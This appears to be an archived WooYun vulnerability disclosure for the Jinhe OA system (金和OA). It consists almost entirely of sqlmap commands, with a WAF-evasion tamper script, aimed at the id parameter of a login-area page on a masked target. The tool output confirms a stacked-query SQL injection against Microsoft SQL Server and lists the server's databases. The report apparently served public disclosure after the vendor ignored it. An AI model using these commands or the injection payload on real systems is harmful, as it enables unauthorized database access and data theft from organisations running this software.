乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-03: 细节已通知厂商并且等待厂商处理中 2015-12-08: 厂商已经主动忽略漏洞,细节向公众公开
金和OA的锅
python sqlmap.py -u "http://**.**.**.**/c6/Jhsoft.Web.login/newview.aspx?id=1" --tamper tamper/space2comment.py
[11:55:58] [INFO] loading tamper script 'space2comment'[11:55:58] [INFO] testing connection to the target URL[11:55:58] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS[11:55:58] [INFO] testing if the target URL is stable[11:55:59] [INFO] target URL is stable[11:55:59] [INFO] testing if GET parameter 'id' is dynamic[11:55:59] [WARNING] GET parameter 'id' does not appear dynamic[11:55:59] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable[11:55:59] [INFO] testing for SQL injection on GET parameter 'id'[11:55:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[11:56:01] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'[11:56:01] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'[11:56:02] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'[11:56:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'[11:56:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'[11:56:04] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'[11:56:05] [INFO] testing 'MySQL inline queries'[11:56:05] [INFO] testing 'PostgreSQL inline queries'[11:56:05] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'[11:56:05] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'[11:56:06] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'[11:56:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'[11:56:17] [INFO] GET parameter 'id' seems to be 'Microsoft SQL Server/Sybase stacked queries (comment)' injectable it looks like the back-end DBMS is '['Microsoft SQL Server', 'Sybase']'. Do you want to skip test for the remaining tests, do you want to include all tests for '['Microsoft SQL Server', 'Sybase']' extending provided level (1) and risk (1) values? [Y/n] [11:56:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'[11:56:35] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found[11:56:38] [INFO] checking if the injection point on GET parameter 'id' is a false positive[11:56:49] [INFO] heuristics detected web page charset 'utf-8'[11:56:49] [WARNING] parameter length constrainting mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expectedGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 85 HTTP(s) requests:---Parameter: id (GET) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: id=1;WAITFOR DELAY '0:0:5'-----[11:57:21] [WARNING] changes made by tampering scripts are not included in shown payload content(s)[11:57:21] [INFO] testing Microsoft SQL Server[11:57:21] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] [11:57:31] [INFO] confirming Microsoft SQL Server[11:57:42] [INFO] adjusting time delay to 1 second due to good response times[11:57:43] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008
python sqlmap.py -u "http://**.**.**.**/c6/Jhsoft.Web.login/newview.aspx?id=1" --tamper tamper/space2comment.py --dbms mssql --table
[11:58:33] [INFO] loading tamper script 'space2comment'[11:58:33] [INFO] testing connection to the target URL[11:58:33] [INFO] checking if the target is protected by some kind of WAF/IPS/IDSsqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: id=1;WAITFOR DELAY '0:0:5'-----[11:58:33] [WARNING] changes made by tampering scripts are not included in shown payload content(s)[11:58:33] [INFO] testing Microsoft SQL Server[11:58:33] [INFO] confirming Microsoft SQL Server[11:58:33] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008[11:58:33] [INFO] fetching database names[11:58:33] [INFO] fetching number of databases[11:58:33] [WARNING] time-based comparison requires larger statistical model, please wait.............................do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] [11:58:45] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 7[11:58:51] [INFO] retrieved: [11:58:56] [INFO] adjusting time delay to 1 second due to good response timesC6[11:59:04] [INFO] retrieved: master[11:59:35] [INFO] retrieved: model[12:00:04] [INFO] retrieved: msdb[12:00:25] [INFO] retrieved: ReportServer[12:01:29] [INFO] retrieved: ReportServerTempDB[12:03:05] [INFO] retrieved: tempdb
你们比我懂
危害等级:无影响厂商忽略
忽略时间:2015-12-08 14:08
暂无